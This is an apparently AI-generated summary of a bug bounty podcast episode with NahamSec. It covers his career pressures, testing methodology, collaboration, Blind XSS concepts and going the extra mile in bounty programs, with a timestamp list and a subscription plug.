NahamSec, a bug bounty hunter and content creator, discusses his journey and challenges, including personal struggles and the pressure of success. Topics covered include finding balance, managing mental energy, planning and setting goals, Blind XSS techniques, and going the extra mile in bug bounty.
Being open to change and trying different approaches is crucial for success in hacking.
Thorough testing, pattern recognition, and collaboration enhance the vulnerability detection process.
Balancing thorough testing and efficiency is essential for effective hacking.
Collaboration with other hackers boosts the effectiveness of exploiting vulnerabilities and enhances hacking skills.
Deep dives
The Importance of Pivoting and Trying Different Approaches
The speaker emphasizes the significance of pivoting and trying different approaches in hacking. They share their personal experience of needing a change and wanting to explore new techniques. The speaker mentions how they transitioned from focusing on recon and web-oriented hacking to exploring vulnerabilities in desktop apps. They highlight the value of collaboration and how teaming up with other hackers, like Shmoo and Alex Chapman, helped them exploit vulnerabilities in desktop apps. The key takeaway is that being open to change and trying different approaches is crucial for success in hacking.
The Process of Testing and Recognizing Vulnerabilities
The speaker discusses their methodology in testing and recognizing vulnerabilities. They emphasize the importance of pattern recognition and identifying vulnerabilities specific to each target. The speaker explains how they apply thorough testing by using repeated payloads and analyzing the behavior of the application. They mention the significance of understanding various contexts, such as HTML injection and breaking out of existing limitations. The speaker also highlights the role of collaboration, seeking input from others, and learning from the community to enhance their testing process.
The Balance Between Thorough Testing and Efficiency
The speaker acknowledges the need to balance thorough testing and efficiency in hacking. They discuss how they spend time carefully testing fields, using both simple and polyglot payloads to break out of input fields. However, they also mention the importance of setting limits and recognizing when to move on from a specific target. The speaker's approach depends on their workload and the potential rewards of the program. They emphasize the significance of ROI (return on investment) and the patterns of mistakes specific to each company.
Recognizing the Value of Collaboration
The speaker highlights the value of collaboration in hacking. They share examples of collaborating with other hackers, like Shmoo and Alex Chapman, to exploit vulnerabilities in desktop apps. The speaker explains how collaborating can bring fresh perspectives, new ideas, and help boost the effectiveness of exploiting vulnerabilities. They encourage open collaboration, reaching out to fellow hackers for input and suggestions. The speaker also emphasizes the role of collaboration in the bug bounty community to collectively enhance hacking skills and knowledge.
Importance of Going the Extra Mile
Going the extra mile in a bug bounty program, such as setting up a premium account or providing additional verification, can yield significant benefits. It opens up more opportunities and rewards, helps build a closer relationship with the company, and allows for deeper testing and customization of the environment.
The Significance of Blind XSS
Blind XSS is a valuable vulnerability to target as it often occurs in the backend where companies and teams can see it. This type of XSS requires considering where the payload will end up and how it will be triggered. By using a specialized payload and tracking its execution, hackers can gain an advantage and potentially find blind XSS vulnerabilities.
The Impact of CSP and Customization
While content security policy (CSP) can sometimes pose a challenge for blind XSS, it doesn't always hinder these types of attacks. Hackers can focus on exploiting other areas instead. Going the extra mile includes customizing your environment, setting up proper tracking, and taking advantage of opportunities that may arise beyond traditional XSS payloads.
Benefits of Premium Features and Setup
Investing in premium features and setting up your environment in a bug bounty program can provide numerous benefits. These can include better access, improved testing capabilities, more detailed reports, enhanced collaboration opportunities, and increased potential for rewards. Going above and beyond can yield positive outcomes in terms of both findings and relationships with the company.
Episode 53: In this episode of Critical Thinking - Bug Bounty Podcast,we’re joined by none other than NahamSec. We start by discusses the challenges he faced on his journey in bug bounty hunting and content creation, including personal struggles and the pressure of success.We also talk about finding balance and managing mental energy, going the extra mile, and the importance of planning and setting goals for yourself before he walks us through some Blind XSS techniques.
We also do Discord subs at $25, $10, $5 - premium subscribers get access to private masterclasses, exploits, tools, scripts, un-redacted bug reports, etc.
Timestamps:
(00:00:00) Introduction
(00:01:37) Costs of Content Creation
(00:21:12) Hacking 'identities' and Pivoting
(00:36:49) Hacking Methodology
(00:58:59) Planning, Goals, and Nahamsec's 2023 Performance
(01:10:19) Blind XSS
(01:35:19) Going the extra mile in Bug Bounty
Remember Everything You Learn from Podcasts
Save insights instantly, chat with episodes, and build lasting knowledge - all powered by AI.
